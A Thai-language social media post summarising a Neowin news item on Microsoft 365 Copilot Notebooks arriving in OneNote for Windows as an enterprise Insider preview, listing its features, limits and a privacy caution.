    ฟีเจอร์นี้ช่วยให้ผู้ใช้สามารถ สรุปข้อมูล, วิเคราะห์เอกสาร และสร้างเนื้อหาเสียง ได้
    มีข้อจำกัดบางประการ เช่น สามารถเพิ่มไฟล์อ้างอิงได้สูงสุด 20 ไฟล์ และสามารถเพิ่มได้เฉพาะ หน้า OneNote แต่ไม่สามารถเพิ่ม sections หรือ notebooks ได้
    ฟีเจอร์บางอย่างของ OneNote ยังไม่สามารถใช้งานได้ใน Copilot Notebooks เช่น tags, section groups, inking, templates, password protection, Immersive Reader และ offline support
    ฟีเจอร์นี้เปิดให้ใช้งานในรูปแบบ Insider Preview ซึ่ง Microsoft อาจปรับปรุงเพิ่มเติมก่อนเปิดตัวอย่างเป็นทางการ
    AI ในการทำงาน: การใช้ AI เช่น Copilot ช่วยให้การทำงานมีประสิทธิภาพมากขึ้น โดยช่วยลดเวลาที่ใช้ในการรวบรวมข้อมูลและสร้างเนื้อหา
    แนวโน้มของ AI ในองค์กร: หลายองค์กรเริ่มนำ AI มาใช้เพื่อช่วยในการจัดการข้อมูลและเพิ่มประสิทธิภาพในการทำงาน
    การเปรียบเทียบกับเครื่องมืออื่น: Copilot Notebooks มีความคล้ายคลึงกับเครื่องมือจัดการข้อมูลอื่น ๆ เช่น Notion หรือ Evernote แต่มีการผสานรวมกับ Microsoft 365 ทำให้สะดวกต่อผู้ใช้ที่อยู่ในระบบของ Microsoft

    ข้อจำกัดของฟีเจอร์: ผู้ใช้ควรทราบว่า Copilot Notebooks ยังมีข้อจำกัดหลายประการ เช่น จำนวนไฟล์ที่สามารถเพิ่มได้ และฟีเจอร์บางอย่างของ OneNote ที่ยังไม่รองรับ
    การใช้งานในองค์กร: เนื่องจากฟีเจอร์นี้ออกแบบมาสำหรับลูกค้าองค์กร ผู้ใช้ทั่วไปอาจไม่สามารถเข้าถึงได้
    ความเป็นส่วนตัวของข้อมูล: การใช้ AI ในการจัดการข้อมูลอาจมีข้อกังวลเกี่ยวกับความเป็นส่วนตัว ผู้ใช้ควรตรวจสอบนโยบายการใช้งานของ Microsoft เพื่อให้แน่ใจว่าข้อมูลของตนได้รับการปกป้องอย่างเหมาะสม

    https://www.neowin.net/news/microsoft-365-copilot-notebooks-now-integrated-in-onenote-on-windows/
    Microsoft ได้เปิดตัว Microsoft 365 Copilot Notebooks ซึ่งเป็นฟีเจอร์ใหม่ที่ช่วยให้ผู้ใช้สามารถรวบรวมข้อมูลจากแหล่งต่าง ๆ เช่น Copilot Chat, ไฟล์, โน้ต และลิงก์ ไว้ในที่เดียวกันเพื่อเพิ่มประสิทธิภาพในการทำงาน โดยฟีเจอร์นี้ถูกออกแบบมาเพื่อ ลูกค้าองค์กร ที่มี Microsoft 365 Copilot, SharePoint หรือ OneDrive licenses และสามารถใช้งานได้บน OneNote เวอร์ชัน 2504 (Build 18827.20128) หรือใหม่กว่า สรุปเนื้อหาข่าว ✅ Microsoft 365 Copilot Notebooks ถูกผนวกเข้ากับ OneNote บน Windows เพื่อช่วยให้ผู้ใช้สามารถรวบรวมข้อมูลและสร้างเนื้อหาที่มีประสิทธิภาพมากขึ้น ✅ ผู้ใช้สามารถสร้าง Copilot Notebook ได้โดยไปที่ Home > Create Copilot Notebook หรือ New notebook และสามารถเพิ่มเอกสารอ้างอิง เช่น OneNote pages, .docx, .pptx, .xlsx, .pdf หรือ .loop files เพื่อให้ Copilot มีบริบทในการให้คำตอบที่แม่นยำขึ้น ✅ ฟีเจอร์นี้ช่วยให้ผู้ใช้สามารถ สรุปข้อมูล, วิเคราะห์เอกสาร และสร้างเนื้อหาเสียง ได้ ✅ มีข้อจำกัดบางประการ เช่น สามารถเพิ่มไฟล์อ้างอิงได้สูงสุด 20 ไฟล์ และสามารถเพิ่มได้เฉพาะ หน้า OneNote แต่ไม่สามารถเพิ่ม sections หรือ notebooks ได้ ✅ ฟีเจอร์บางอย่างของ OneNote ยังไม่สามารถใช้งานได้ใน Copilot Notebooks เช่น tags, section groups, inking, templates, password protection, Immersive Reader และ offline support ✅ ฟีเจอร์นี้เปิดให้ใช้งานในรูปแบบ Insider Preview ซึ่ง Microsoft อาจปรับปรุงเพิ่มเติมก่อนเปิดตัวอย่างเป็นทางการ ✅ AI ในการทำงาน: การใช้ AI เช่น Copilot ช่วยให้การทำงานมีประสิทธิภาพมากขึ้น โดยช่วยลดเวลาที่ใช้ในการรวบรวมข้อมูลและสร้างเนื้อหา ✅ แนวโน้มของ AI ในองค์กร: หลายองค์กรเริ่มนำ AI มาใช้เพื่อช่วยในการจัดการข้อมูลและเพิ่มประสิทธิภาพในการทำงาน ✅ การเปรียบเทียบกับเครื่องมืออื่น: Copilot Notebooks มีความคล้ายคลึงกับเครื่องมือจัดการข้อมูลอื่น ๆ เช่น Notion หรือ Evernote แต่มีการผสานรวมกับ Microsoft 365 ทำให้สะดวกต่อผู้ใช้ที่อยู่ในระบบของ Microsoft ‼️ ข้อจำกัดของฟีเจอร์: ผู้ใช้ควรทราบว่า Copilot Notebooks ยังมีข้อจำกัดหลายประการ เช่น จำนวนไฟล์ที่สามารถเพิ่มได้ และฟีเจอร์บางอย่างของ OneNote ที่ยังไม่รองรับ ‼️ การใช้งานในองค์กร: เนื่องจากฟีเจอร์นี้ออกแบบมาสำหรับลูกค้าองค์กร ผู้ใช้ทั่วไปอาจไม่สามารถเข้าถึงได้ ‼️ ความเป็นส่วนตัวของข้อมูล: การใช้ AI ในการจัดการข้อมูลอาจมีข้อกังวลเกี่ยวกับความเป็นส่วนตัว ผู้ใช้ควรตรวจสอบนโยบายการใช้งานของ Microsoft เพื่อให้แน่ใจว่าข้อมูลของตนได้รับการปกป้องอย่างเหมาะสม https://www.neowin.net/news/microsoft-365-copilot-notebooks-now-integrated-in-onenote-on-windows/
    WWW.NEOWIN.NET
    Microsoft 365 Copilot Notebooks now integrated in OneNote on Windows
    Microsoft has announced the availability of Microsoft 365 Copilot Notebooks in OneNote for Windows as an Insider preview for Enterprise customers.
    0 ความคิดเห็น 0 การแบ่งปัน 540 มุมมอง 0 รีวิว
Pages Boosts